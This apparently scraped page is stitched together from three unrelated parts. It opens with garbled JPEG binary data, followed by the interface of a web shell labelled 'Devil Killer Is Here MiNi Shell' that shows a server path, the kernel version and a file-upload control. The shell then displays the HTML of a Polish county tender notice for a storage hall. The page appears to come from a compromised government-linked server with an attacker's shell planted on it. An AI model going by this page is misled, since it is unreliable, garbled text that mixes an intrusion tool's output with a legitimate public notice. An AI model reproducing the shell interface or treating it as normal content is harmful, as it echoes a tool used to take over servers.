JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251006/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251006/0045890401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa hali magazynowej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Gołdapski</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Starostwo Powiatowe w Gołdapi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 519634600</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Krótka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gołdap</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">87 615 44 44</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">starostwo@powiatgoldap.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://powiatgoldap.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa hali magazynowej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d04126ac-7b67-4bd2-a169-0f54312f6781</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00458904</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00037586/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 „Budowa hali magazynowej”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d04126ac-7b67-4bd2-a169-0f54312f6781 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie o udzielenie zamówienia publicznego prowadzone jest w języku polskim.<br/>2.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówieni, która dostępna jest pod adresem https://ezamowienia.gov.pl <br/>3.	Korzystanie z Platformy jest bezpłatne.<br/>4.	Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia) https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d04126ac-7b67-4bd2-a169-0f54312f6781 <br/>5.	Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/ konkursy”).<br/>6.	Identyfikator postępowania na platformie e-Zamówienia –ocds-148610-d04126ac-7b67-4bd2-a169-0f54312f6781</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania zostały wskazane w SWZ<br/> dział I rozdział XII. Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z<br/> wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji<br/> elektronicznej</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z Rozporządzeniem UE 2016/679 z 27 kwietnia 2016r. (zwanym dalej RODO) Administratorem danych osobowych przetwarzanych w ramach zadań realizowanych przez Starostwo Powiatowe w Gołdapi zgodnie z regulaminem organizacyjnym jest Starosta Gołdapski, 19-500 Gołdap, ul. Krótka 1.<br/>2. Starosta Gołdapski wyznaczył Zarządzeniem Nr 31/2018 z dnia 23 maja 2018r. w sprawie powołania wspólnego inspektora ochrony danych, Inspektora Ochrony Danych - e-mail: iod@powiagoldap.pl, 19-500 Gołdap, ul. Krótka 1, tel. (87) 615 44 19.<br/>3. Podstawy prawne przetwarzania:<br/>a) w przypadku realizacji obowiązku prawnego nałożonego na Starostę Gołdapskiego na podstawie przepisów prawa - państwa dane osobowe przetwarzane są:<br/>- w celu realizacji zadań wynikających z przepisów prawa,<br/>- na podstawie art. 6 ust. 1 lit c) RODO,<br/>- ich podanie jest obowiązkowe co wynika z przepisów prawa. <br/>b) w przypadku zadań realizowanych w interesie publicznym lub w ramach sprawowania przez Starostę Gołdapskiego władzy publicznej na podstawie właściwych przepisów prawa - państwa dane osobowe przetwarzane są:<br/>- w celu realizacji zadań wynikających z przepisów prawa,<br/>- na podstawie art. 6 ust. 1 lit. e) RODO,<br/>- ich podanie jest obowiązkowe co wynika z przepisów prawa. <br/>c) w przypadku zawarcia umowy na wykonanie usług lub dostaw lub zawarcia umowy o charakterze cywilnoprawnym - państwa dane osobowe przetwarzane są:<br/>- w celu przygotowania, realizacji i rozliczenia umowy,<br/>- na podstawie art. 6 ust. 1 lit. b) RODO,<br/>- ich podanie jest dobrowolne, jednakże ich podanie jest warunkiem zawarcia umowy.<br/>d) w przypadku dobrowolnego korzystania z usług ułatwiających dostęp lub załatwienie spraw w Starostwie Powiatowym w Gołdapi - państwa dane osobowe przetwarzane są:<br/>- wyłącznie w celu realizacji usługi udostępnionej przez Starostwo Powiatowe w Gołdapi,<br/>- na podstawie art. 6 ust. 1 lit. b) RODO,<br/>- podanie danych osobowych jest dobrowolne,<br/>- w tym zakresie przysługuje Państwu prawo cofnięcia zgody w dowolnym momencie, które będzie skutkowało zatrzymaniem realizacji usługi udostępnianej przez Starostwo Powiatowe w Gołdapi. Cofnięcie zgody pozostaje bez wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem.<br/>4. Informujemy, iż dane osobowe będą przetwarzane przez okres niezbędny do realizacji wymienianych w punkcie 3 celów:<br/>a) przez okres wymagany przepisami prawa,<br/>b) do końca okresu przedawnienia potencjalnych roszczeń z umowy,<br/>c) do czasu wycofania zgody na przetwarzanie danych osobowych.<br/>5. Państwa dane osobowe mogą być ujawnione podmiotom realizującym zadania na rzecz administratora danych osobowych, takim jak dostawcy oprogramowania wyłącznie w celu zapewnienia ich sprawnego działania z zachowaniem zasad ochrony danych osobowych i poufności przetwarzania, operatorzy pocztowi w celu zapewnienia korespondencji, banki w celu realizacji przelewów, podmioty publiczne w ramach zawartych porozumień i umów oraz w zakresie obowiązujących przepisów prawa.<br/>6. Przysługuje Państwu prawo do żądania od Administratora danych osobowych dostępu do swoich danych osobowych, ich sprostowania, usunięcia lub ograniczenia ich przetwarzania.<br/>7. Przysługuje Państwu prawo do przenoszenia danych w zakresie w jakim są one przetwarzane w systemach informatycznych na podstawie udzielonej zgody lub w celu zawarcia, wykonania i realizacji umowy.<br/>8. Przysługuje Państwu prawo do wniesienia sprzeciwu wobec przetwarzania w sytuacjach gdy dane osobowe przetwarzane są w celu zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej lub przetwarzanie jest niezbędne do celów wynikających z prawnie uzasadnionych interesów realizowanych przez administratora.<br/>9. Przysługuje Państwu prawo wniesienia skargi do organu nadzorczego: Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.272.13.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: „Budowa hali magazynowej&#34; w ramach Programu Ochrony Ludności i Obrony Cywilnej na lata 2025/2026 w formule zaprojektuj i wybuduj.<br/>2.	Opis przedmiotu zamówienia:<br/>Przedmiotem zamówienia jest: kompleksowe zaprojektowanie i wykonanie robót budowlanych oraz oddanie do użytkowania na działce nr 1885/14 (znajdującej się w Gołdapi)- hali magazynowej wraz z niezbędną infrastrukturą towarzyszącą, w formule „zaprojektuj i wybuduj”, zgodnie z obowiązującymi przepisami, normami i wymaganiami Zamawiającego.<br/>Zakres obejmuje w szczególności:<br/>1.	Opracowanie dokumentacji projektowej (projekt budowlany, wykonawczy, branżowe).<br/>2.	Uzyskanie wszelkich uzgodnień, opinii i decyzji niezbędnych do uzyskania pozwolenia na budowę.<br/>3.	Uzyskanie decyzji o pozwoleniu na budowę w imieniu Zamawiającego.<br/>4.	Wykonanie robót budowlanych zgodnie z zatwierdzonym projektem.<br/>5.	Uzyskanie pozwolenia na użytkowanie (lub skuteczne zgłoszenie zakończenia robót).<br/>6.	Przekazanie kompletnej dokumentacji powykonawczej i instrukcji użytkowania obiektu.<br/><br/>Szczegółowy opis przedmiotu zamówienia<br/>1. NIERUCHOMOŚĆ, TERENY ZEWNĘTRZNE, ZAGOSPODAROWANIE TERENU<br/>1.1. Wjazd/wyjazd główny<br/>Projekt przewiduje zaprojektowanie nowego zjazdu z ul. Lwowskiej.<br/>1.2. Drogi wewnętrzne, place manewrowe, parkingi<br/>•	nawierzchnia: kostka betonowa,<br/>•	nośność: kategoria ruchu KR3,<br/>•	ciąg komunikacyjny: droga dojazdowa o szerokości min. 5,0 m,<br/>•	zjazd zwykły z ul. Lwowskiej na warunkach zarządcy drogi,<br/>•	szerokość placów manewrowych zgodna z załącznikiem graficznym,<br/>•	maksymalne pochylenie placów manewrowych: 2% (lub indywidualnie do potwierdzenia),<br/>1.3. Odwodnienie terenu<br/>•	do istniejącej sieci kanalizacji deszczowej (na warunkach zarządcy sieci) lub poprzez rozbudowę istniejących urządzeń na działce,<br/>•	zbieranie wód deszczowych z placów manewrowych za pomocą wpustów ulicznych,<br/>•	odprowadzenie wód deszczowych z dachu hali systemem rynnowym — powierzchniowo na teren działki, lub do instalacji kanalizacji deszczowej.<br/>1.4. Oświetlenie terenu<br/>•	średnie natężenie oświetlenia na terenach zewnętrznych utwardzonych: 10 lx (zgodnie z przepisami prawa),<br/>•	oprawy mocowane na elewacji budynku ,<br/>•	oprawy w technologii LED.<br/>1.5. Inne elementy zagospodarowania terenu<br/>•	WLZ — wewnętrzna linia zasilająca budynek w energię elektryczną – rozbudowa istniejącej infrastruktury (zalicznikowo).<br/>2. BUDYNEK MAGAZYNOWY<br/>2.1. Wymiary<br/>•	powierzchnia zabudowy: ok. 161,2 m²,<br/>•	powierzchnia użytkowa części magazynowej: ok. 150 m²,<br/>•	wymiary w osiach konstrukcji: dł. 15,0 m × szer. 10,0 m,<br/>•	wysokość budynku: 5,45 m,<br/>•	wysokość do okapu: 5,0 m.<br/>2.2. Obciążenia<br/>•	IV strefa obciążenia śniegiem,<br/>•	I strefa obciążenia wiatrem,<br/>•	oddziaływania użytkowe,<br/>•	obciążenie instalacjami: 0,3 kN/m²,<br/>•	instalacja fotowoltaiczna: 0,2 kN/m².<br/>2.3. Konstrukcja<br/>•	fundamenty żelbetowe wylewane na poduszce z betonu podkładowego,<br/>•	podwaliny żelbetowe — ocieplone,<br/>•	główna konstrukcja nośna — stalowa,<br/>•	zabezpieczenie antykorozyjne — cynkowanie ogniowe.<br/>2.4. Posadzka<br/>•	obciążenie: 50 kN/m²,<br/>•	płyta żelbetowa (zbrojenie rozproszone), grubość ok. 20 cm, utwardzona, niepyląca, dylatowana,<br/>•	złącza kompensacyjne przy wszystkich słupach,<br/>•	płaskość posadzki zgodna z normą DIN 18202, tabela 3, linia 3.<br/>2.5. Elewacja<br/>•	cokół: ocieplane żelbetowe belki obwodowe o wys. min. 0,3 m ponad poziom posadzki,<br/>•	płyty warstwowe z rdzeniem PIR, układ poziomy, gr. 12 cm, kolorystyka do potwierdzenia,<br/>•	dwie lampy oświetlenia zewnętrznego nad bramami (sterowanie zegarem astronomicznym lub czujnikiem zmierzchowym).<br/>2.6. Dach<br/>•	dach dwuspadowy, symetryczny,<br/>•	pokrycie: płyty warstwowe z rdzeniem PIR gr. 15–16 cm,<br/>•	instalacja odgromowa,<br/>•	dostęp: zewnętrzna drabina wyłazowa, zabezpieczona przed niekontrolowanym dostępem, zgodna z przepisami,<br/>•	świetlik kalenicowy o wymiarach: dł. 10 m × szer. 2,0 m.<br/>2.7. Okna, drzwi<br/>•	drzwi zewnętrzne ewakuacyjne stalowe, w kolorze elewacji, wyposażone w samozamykacz,<br/>•	izolacyjność termiczna zgodna z obowiązującymi przepisami.<br/>2.8. Bramy<br/>•	producent: Hörmann lub równoważny (do potwierdzenia),<br/>•	bramy segmentowe: 4,0 × 4,5 m (szer. × wys.), montowane na podkonstrukcjach stalowych, układ pionowy, podnoszone elektrycznie,<br/>•	wyposażenie: silnik, panel sterujący, panel (segment) gr. 42 mm,<br/>•	przy każdej bramie zestaw gniazd elektrycznych (3 × 230 V),<br/>•	możliwość sterowania ręcznego przy zaniku napięcia.<br/>2.9. Instalacja elektryczna<br/>•	dostosowanie istniejącej rozdzielni, wyprowadzenie i podłączenie kabli (wlz),<br/>•	Wykonanie tablicy modułowej w projektowanym budynku,<br/>•	3 zestawy gniazd (2 gniazda trójfazowe: 1 × 16 A + 1 × 32 A oraz 3 gniazda jednofazowe) z zabezpieczeniem; lokalizacja do potwierdzenia.<br/>2.10. Oświetlenie wewnętrzne<br/>•	oprawy hermetyczne (IP &gt; 20) z LED,<br/>•	temperatura barwowa: 4000 K,<br/>•	montaż na wys. ok. 5,0 m,<br/>•	oświetlenie podstawowe: min. 300 lx, równomierność, olśnienie, migotanie i oddawanie barw zgodnie z przepisami,<br/>•	oświetlenie awaryjne i ewakuacyjne: autonomiczne oprawy LED, zgodnie z przepisami.<br/>2.11. Instalacja ogrzewania<br/>Na obecnym etapie nie przewiduje się ogrzewania budynku.<br/>2.12. Instalacje wod.-kan.<br/>W budynku nie przewiduje się instalacji wod.-kan.<br/>2.13. Instalacja wentylacji<br/>Wentylacja grawitacyjna.<br/>2.14. Instalacja zabezpieczeń ppoż.<br/>Obciążenie ogniowe do 500 MJ/m².<br/>2.15. Zabezpieczenia bram przed uszkodzeniami mechanicznymi<br/>•	odbojniki malowane w żółto-czarne pasy Ø110, H=100cm montowane wewnątrz i na zewnątrz (8szt.), </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych <br/>w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: <br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/>a) doświadczenie wykonawcy:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed <br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej: 2 roboty polegające na budowie hali o powierzchni minimum 100 m 2 i wartości nie mniejszej niż <br/>300 000,00 zł. brutto, każda.<br/>Uwaga:<br/>1) W przypadku, gdy ww. zakres robót budowlanych będzie stanowił część robót o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić rodzajowo i kwotowo roboty, o których mowa powyżej;<br/>2)	Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości zostaną podane <br/>w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.<br/>b)	kwalifikacje zawodowe kadry technicznej: <br/> Wykonawca powinien wykazać, że dysponuje lub będzie dysponować: co najmniej jedną osobą posiadającą <br/> uprawnienia budowlane do kierowania robotami w specjalności: <br/>1)	kierownik robót konstrukcyjno - budowlany – 1 osoba<br/>- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności ogólnobudowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, <br/>- doświadczenie zawodowe- co najmniej 5 lata od uzyskania uprawnień,<br/>2)	kierownik robót instalacyjnych elektrycznych – 1 osoba<br/>- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, <br/>- doświadczenie zawodowe- co najmniej 5 lata od uzyskania uprawnień,<br/><br/>Uwaga: W/w osoby muszą posiadać ważne uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2025.418) oraz w Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia <br/>29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych <br/>w budownictwie 